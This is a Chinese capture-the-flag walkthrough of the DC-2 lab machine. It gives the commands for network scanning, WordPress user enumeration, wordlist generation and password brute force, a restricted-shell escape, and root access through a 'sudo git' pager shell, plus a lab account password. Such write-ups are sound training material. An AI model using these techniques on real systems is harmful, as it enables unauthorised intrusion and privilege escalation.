DC2靶机渗透测试
文章目錄
- 目標:收集 5 個 flag
- 一、信息收集
- 1.主機發(fā)現(xiàn)
- 2.端口掃描
- 二、漏洞挖掘
- 1.訪問靶機 80 端口,查看其使用了什么 cms
- 2.目錄掃描
- 3.掃描用戶名
- 4.生成字典
- 5.爆破密碼
- 6.使用賬號密碼登陸,在登陸 Jerry 時發(fā)現(xiàn) flag2
- 7.使用 ssh
- 1.使用 jerry 登陸,失敗,得知該 ssh 密碼與 wordpress 密碼不一致
- 2.使用 tom 登陸,成功
- 8.rbash繞過
- 9.git 提權
目標:收集 5 個 flag
一、信息收集
1.主機發(fā)現(xiàn)
已知靶機與攻擊機在同一網(wǎng)段,掃描同網(wǎng)段
arp-scan -l
發(fā)現(xiàn)靶機 ip
2.端口掃描
nmap -A -p- 192.168.43.105 # -A 全面掃描 # -p- 掃描全面端口
發(fā)現(xiàn)開放了 80 端口,Apache 服務
開放了 7744 端口 ssh 服務
二、漏洞挖掘
1.訪問靶機 80 端口,查看其使用了什么 cms
發(fā)現(xiàn) wordpress 框架,及 flag 1
若是跳轉到 http://dc-2 域名然后無法訪問,將 ip 地址、域名 添加到 /etc/hosts 文件
hosts : 定義IP地址和主機名的映射關系,是一個映射IP地址和主機名的規(guī)定。 將一些常用的網(wǎng)址域名對應的 IP 地址記錄,加快域名解析、屏蔽網(wǎng)站等
flag1
你通常的單詞列表可能不起作用,所以,也許你只需要 cewl。
更多的密碼永遠是更好的,但有時你就是不能贏得他們的全部。以一個身份登錄以查看下一個標志。 如果你找不到,就以另一個人的身份登錄。
根據(jù)提示,可能需要使用 cewl ,以及用戶切換操作
2.目錄掃描
nikto -h 192.168.1.110
發(fā)現(xiàn)登陸頁面
3.掃描用戶名
wpscan --url dc-2 -e u
4.生成字典
cewl dc-2 -w dict.txt
5.爆破密碼
wpscan --url dc-2 -P 1.txt
6.使用賬號密碼登陸,在登陸 Jerry 時發(fā)現(xiàn) flag2
如果你不能利用WordPress和走捷徑,還有另外一種方法。希望你找到了另一個入口。
7.使用 ssh
根據(jù)端口掃描,發(fā)現(xiàn)開啟了ssh服務,我們先嘗試連接:
1.使用 jerry 登陸,失敗,得知該 ssh 密碼與 wordpress 密碼不一致
2.使用 tom 登陸,成功
使用 ls 查看文件,發(fā)現(xiàn) flag3 ,使用 cat 打印卻提示 -rbash 權限限制
嘗試使用 vim、vi,發(fā)現(xiàn) vi 成功進入編輯界面,
可憐的老湯姆總是追著杰里,也許他應該克服他所造成的壓力。
提示切換用戶,可惡,謎語人
8.rbash繞過
使用 su jerry 發(fā)現(xiàn) su 被 rbash,使用以下方法繞過 rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
切換用戶,jerry/adipiscing
切換到 /home/jerry 目錄,發(fā)現(xiàn) flag 4
很高興看到你走了這么遠,但你還沒回家。 你仍然需要得到最后的旗子(唯一真正重要的標志!)。 這里沒有提示-你現(xiàn)在只能靠自己了。 快-快離開這里!
雖然還舞舞軒軒,但是還是提示了 Git 提權
9.git 提權
sudo git -p help
!/bin/sh
查找最后的 flag,在 /root/ 目錄下 發(fā)現(xiàn) final-flag.txt
總結
